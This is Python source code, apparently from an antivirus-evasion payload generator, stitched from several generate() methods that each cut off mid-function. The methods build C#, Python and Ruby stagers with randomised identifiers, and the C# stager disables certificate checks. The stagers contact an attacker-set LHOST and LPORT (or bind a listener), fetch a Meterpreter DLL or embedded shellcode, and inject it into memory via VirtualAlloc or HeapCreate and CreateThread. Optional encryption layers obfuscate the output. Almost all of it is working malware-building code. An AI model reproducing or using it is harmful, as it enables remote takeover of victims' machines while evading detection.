payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(12)]
y = [evasion_helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (
evasion_helpers.randomString(), evasion_helpers.randomString())
# code for the randomString() function
randomStringName = evasion_helpers.randomString()
bufferName = evasion_helpers.randomString()
charsName = evasion_helpers.randomString()
t = list(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# logic to turn off certificate validation
validateServerCertficateName = evasion_helpers.randomString()
payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % (
validateServerCertficateName)
# code for the randomString() method
payload_code += "static string %s(Random r, int s) {\n" % (
randomStringName)
payload_code += "char[] %s = new char[s];\n" % (bufferName)
payload_code += "string %s = \"%s\";\n" % (charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" % (bufferName)
# code for the checksum8() function
checksum8Name = evasion_helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = evasion_helpers.randomString()
baseStringName = evasion_helpers.randomString()
randCharsName = evasion_helpers.randomString()
urlName = evasion_helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
randomReturn = evasion_helpers.randomString(4)
payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
genHTTPChecksumName, baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
baseStringName, randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
randCharsName, randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
randCharsName)
payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"%s\";}" % (
checksum8Name, urlName, urlName, randomReturn)
# code for getData() function
getDataName = evasion_helpers.randomString()
strName = evasion_helpers.randomString()
webClientName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
strName)
payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % (
validateServerCertficateName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
webClientName)
# Proxy
if self.required_options["PROXY"][0].lower() == "y":
defaultWebProxyName = evasion_helpers.randomString()
payload_code += "IWebProxy %s = WebRequest.DefaultWebProxy;\n" % (
defaultWebProxyName)
payload_code += "%s.Credentials = CredentialCache.DefaultCredentials;\n" % (
defaultWebProxyName)
payload_code += "%s.Proxy = %s;\n" % (webClientName,
defaultWebProxyName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
webClientName)
payload_code += "byte[] %s = null;\n" % (sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" % (
sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
# code for Main() to launch everything
sName = evasion_helpers.randomString()
randomName = evasion_helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
randomName)
payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % (
sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
payload_code += "%s(%s);}\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(12)]
y = [evasion_helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# socket and shellcode variables that need to be kept global
payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (
shellCodeName, socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += '\t' * num_tabs_required + "def %s():\n" % (
getDataMethodName)
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % (
socketName)
# build the socket and connect to the handler
payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (
socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % (
socketName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (
fdBufName, socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % (
socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (
rcvStringName)
# receive ALL of the payload .dll data
payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (
rcvStringName, rcvStringName, socketName)
payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (
rcvStringName, rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % (
rcvCStringName)
# copy the socket fd in
payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (
rcvCStringName, fdBufName)
payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (
rcvCStringName)
payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % (
injectMethodName, tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % (
tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % (
shellcodeBufName, tempShellcodeName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
# copy the .dll into the allocated memory
payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
# kick the thread off to execute the .dll
payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
# wait for the .dll execution to finish
payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
# Assume HEAP Injection
else:
HeapVar = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the stager
payload_code += '\t' * num_tabs_required + "%s = %s()\n" % (
shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (
injectMethodName, shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize everything, yo'
sumMethodName = evasion_helpers.randomString()
checkinMethodName = evasion_helpers.randomString()
randLettersName = evasion_helpers.randomString()
randLetterSubName = evasion_helpers.randomString()
randBaseName = evasion_helpers.randomString()
downloadMethodName = evasion_helpers.randomString()
hostName = evasion_helpers.randomString()
portName = evasion_helpers.randomString()
requestName = evasion_helpers.randomString()
tName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
dataName = evasion_helpers.randomString()
byteArrayName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
bufName = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
data2Name = evasion_helpers.randomString()
proxy_var = evasion_helpers.randomString()
opener_var = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n"
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# helper method that returns the sum of all ord values in a string % 0x100
payload_code += '\t' * num_tabs_required + "ssl._create_default_https_context = ssl._create_unverified_context\n"
payload_code += '\t' * num_tabs_required + "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payload_code += '\t' * num_tabs_required + "def %s():\n" %(checkinMethodName)
payload_code += '\t' * num_tabs_required + "\tfor x in range(64):\n"
payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
payload_code += '\t' * num_tabs_required + "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
payload_code += '\t' * num_tabs_required + "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payload_code += '\t' * num_tabs_required + "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
payload_code += '\t' * num_tabs_required + '\t' + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\t%s = urllib.request.urlopen(%s)\n" %(tName, requestName)
payload_code += '\t' * num_tabs_required + "\t\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n"
payload_code += '\t' * num_tabs_required + "\t\texcept: return %s.read()\n" % (tName)
payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError: return ''\n"
# method to inject a reflective .dll into memory
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName, dataName)
payload_code += '\t' * num_tabs_required + "\tif %s != \"\":\n" %(dataName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
# Assuming heap injection
else:
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the metpreter .dll and inject it
payload_code += '\t' * num_tabs_required + "%s = ''\n" %(data2Name)
payload_code += '\t' * num_tabs_required + "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payload_code += '\t' * num_tabs_required + "%s(%s)\n" %(injectMethodName, data2Name)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_ends_required = 0
payload_code = ""
# randomly generate out variable names
payloadName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
payload_code = "require 'rubygems'\n"
payload_code += "require 'win32/api'\n"
payload_code += "include Win32\n"
payload_code += "require 'base64'\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options[
"DOMAIN"][0] != "X" or self.required_options["USERNAME"][
0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Base64 Encode Shellcode
Shellcode = base64.b64encode(bytes(Shellcode,
'latin-1')).decode('ascii')
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
payloadName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
protect_out = evasion_helpers.randomString()
rand_protect = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I');" + rand_protect + " = API.new('VirtualProtect', 'PIIP', 'I')\n"
payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n"
payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x04)\n"
payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + protect_out + " = " + rand_protect + ".call(" + ptrName + ",(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x20, 0); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
